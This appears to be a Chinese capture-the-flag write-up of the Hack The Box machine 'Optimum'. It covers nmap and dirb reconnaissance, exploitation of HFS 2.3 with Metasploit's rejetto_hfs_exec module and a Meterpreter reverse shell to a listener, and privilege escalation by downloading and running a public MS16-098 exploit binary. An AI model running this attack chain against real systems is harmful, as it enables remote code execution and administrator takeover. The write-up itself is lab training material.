HackTheBox-Optimum
ip:10.10.10.8
0x01 信息搜集:
1.nmap扫描IPnmap -A -Pn 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 16:05 CST
Nmap scan report for 10.10.10.8
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 250.15 seconds
2.dirb扫描目录dirb http://10.10.10.8/
START_TIME: Mon Feb 24 10:04:49 2020
URL_BASE: http://10.10.10.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
3.访问10.10.10.8 发现后面不管输入什么都会显示报错 直接点开就可成功访问
这里是一个文件共享的网络服务器
(HTTPFileServer是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。)
和一个登陆的界面。
通过搜集找到一个登陆界面http://10.10.10.8/~login
因为在上面已经知道有一个文件共享的网络服务器所以现在我们要在msf当中搜索相关的漏洞
0x02 get webshell:
输入:
mafconsole
use exploit/windows/http/rejetto_hfs_exec
以下是我设置的参数:
options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.8 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8081 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.51 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
在另一边设置本地监听的端口和ip
options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.51 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.10.14.51
LHOST => 10.10.14.51
msf5 exploit(multi/handler) > run
进行攻击
成功获取user用户的flag
0x03 提权:
接下来先获取版本信息,使用命令systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ??
System Boot Time: 1/3/2020, 2:27:51 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.303 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.752 MB
Virtual Memory: In Use: 751 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
这里需要利用Windows 8.1(MS16-098)上RGNOBJ的Integer OVerflow的漏洞利用n°41020,
从github上的exploit-db二进制漏洞利用集合中下载41020.exe下载:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
下载了二进制文件之后使用metasploit将其上传到服务器,并执行它以尝试获取特权提升的shell
执行命令:
shell
41020.exe
cd ../../
more C:\Users\Administrator\Desktop\root.txt
大功告成,成功获取到flag!!!
来源:freebuf.com 2021-07-01 09:34:44 by: umbrella1CE
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册